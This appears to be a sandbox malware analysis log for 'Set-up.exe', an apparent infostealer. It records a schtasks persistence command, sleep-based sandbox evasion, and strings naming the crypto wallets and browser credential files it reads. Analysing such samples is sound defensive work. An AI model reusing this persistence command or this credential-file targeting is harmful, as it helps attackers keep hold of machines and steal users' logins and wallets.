Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Set-up.exe ReversingLabs: Detection: 42%
Source: Set-up.exe String found in binary or memory: /addr_imp
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ehmlfmzycqqvkbieuybc.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 6614719 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x476600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B8370 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_004B8370
Source: Set-up.exe Static PE information: section name: /4
Source: Set-up.exe Static PE information: section name: /14
Source: Set-up.exe Static PE information: section name: /29
Source: Set-up.exe Static PE information: section name: /41
Source: Set-up.exe Static PE information: section name: /55
Source: Set-up.exe Static PE information: section name: /67
Source: Set-up.exe Static PE information: section name: /80
Source: Set-up.exe Static PE information: section name: /91
Source: Set-up.exe Static PE information: section name: /102
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ehMlFMzYcqQvKbiEUyBC.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004BB11B push eax; iretd 4_2_004BB171
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C360C20 push eax; mov dword ptr [esp], ebx 4_2_6C360E46
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3C0DD8 push edx; mov dword ptr [esp], edi 4_2_6C3C0FCF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C37ADC0 push eax; mov dword ptr [esp], ebx 4_2_6C37B19B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36CF10 push eax; mov dword ptr [esp], ebx 4_2_6C36D180
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36CF10 push edx; mov dword ptr [esp], ebx 4_2_6C36D19A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C354F81 push eax; mov dword ptr [esp], ebx 4_2_6C354FA7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C354FE0 push eax; mov dword ptr [esp], ebx 4_2_6C3555D7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C35284A push eax; mov dword ptr [esp], esi 4_2_6C35285B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C386900 push eax; mov dword ptr [esp], esi 4_2_6C3BF741
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3549B0 push eax; mov dword ptr [esp], ebx 4_2_6C354FA7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C384980 push eax; mov dword ptr [esp], esi 4_2_6C3BF741
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340A30 push eax; mov dword ptr [esp], ebx 4_2_6C340A44
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C313FBA push eax; mov dword ptr [esp], ebx 4_2_6C3C0B12
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342AE8 push edx; mov dword ptr [esp], ebx 4_2_6C342AFC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C318438 push eax; mov dword ptr [esp], ebx 4_2_6C3C0B12
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36A470 push eax; mov dword ptr [esp], ebx 4_2_6C36A59D
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344479 push eax; mov dword ptr [esp], ebx 4_2_6C34448D
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3804B0 push eax; mov dword ptr [esp], ebx 4_2_6C3809D2
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3544AD push eax; mov dword ptr [esp], ebx 4_2_6C3544C1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C338484 push edx; mov dword ptr [esp], ebx 4_2_6C338498
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3524D4 push ecx; mov dword ptr [esp], ebx 4_2_6C352505
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3524CA push ecx; mov dword ptr [esp], ebx 4_2_6C352505
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3565B0 push eax; mov dword ptr [esp], ebx 4_2_6C3565D8
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3545DA push eax; mov dword ptr [esp], ebx 4_2_6C3545EB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C336667 push edx; mov dword ptr [esp], ebx 4_2_6C33667B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344669 push eax; mov dword ptr [esp], ebx 4_2_6C34467D
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C35272E push eax; mov dword ptr [esp], ebx 4_2_6C352742
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C386710 push eax; mov dword ptr [esp], esi 4_2_6C3BF741
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C358190 push eax; mov dword ptr [esp], ebx 4_2_6C3583DF
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\ehMlFMzYcqQvKbiEUyBC.dll

Boot Survival

Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 884
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.3 %
Source: C:\Users\user\Desktop\Set-up.exe TID: 7408 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7860 Thread sleep count: 884 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7860 Thread sleep time: -88400s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local
Source: Set-up.exe, 00000000.00000003.2040016353.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2261326166.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2261326166.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766684688.000000000131F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.2040016353.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2261326166.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766684688.000000000131F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg
Source: Set-up.exe Binary or memory string: BFastStoneLenovoServiceBridgeVMwareFree_PDF_SolutionsPublicContinuous MigrationSnapshotsSystem Profile
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B8370 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_004B8370
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B117C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 4_2_004B117C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B1170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_004B1170
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B13D1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 4_2_004B13D1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B11B3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_004B11B3
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C374010 cpuid 4_2_6C374010
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 4.2.service123.exe.6c2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2245373256.0000000003E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 7856, type: MEMORYSTR
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: #@com.adobe.dunamisMacromediaUserBenchmarkOpera Software\Opera Crypto StableFeedsvivaldi.exeZoomWalletsStreamingVideoProviderBraavos Smart WalletThinkBuzanDRPSuSUPERAntiSpywareDriverPack CloudCacheCode Cacheblob_storagevcpkgIntelexodusexchangeElectrumGraineSearches\ProfilesRoaming\...KeepSolid Incnkbihfbeogaeaoehlefnkodbefgpgknnsollink.txt.rtf.xls.pdf.docXuanZhi9XuanZhiMaxonBlueStacks X
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: VSApplicationInsights\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)productionpreferencespkgsSavesMusic3D Objectsadspower_globalNVIDIA Corporation\Riot Games\ViberPC
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: zcodecom.liberty.jaxxDisc_Soft_FZE_LLCwebview2Rockstar GamesCaphyoncwd_globalJavaScriptPCHealthCheck
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: C}%D}Crystal Dynamicsatomic\Storage\Exodus\OneDrive\
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: H11.0.2PhotoWorksFPSChessActivisiondotnetWindows 2000 %wSVirtualBoxsyncpedapocogameLedger Live\microAppsejbalbakoplchlghecdalmeeeajnimhmOpera Beta.androidOpera CryptotdummyemojiEMPRESSTSMonitorBitTorrentBitTorrentHelpermentalmentorwallethtxmetaTaskSchedulerConfigPenWorkspacePlayReadyTreexyWeb DataCookiesbhhhlbepdkbapadjdnnojkbgioiodbicEthereum (UTC)wallet_dat3
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7328, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7328, type: MEMORYSTR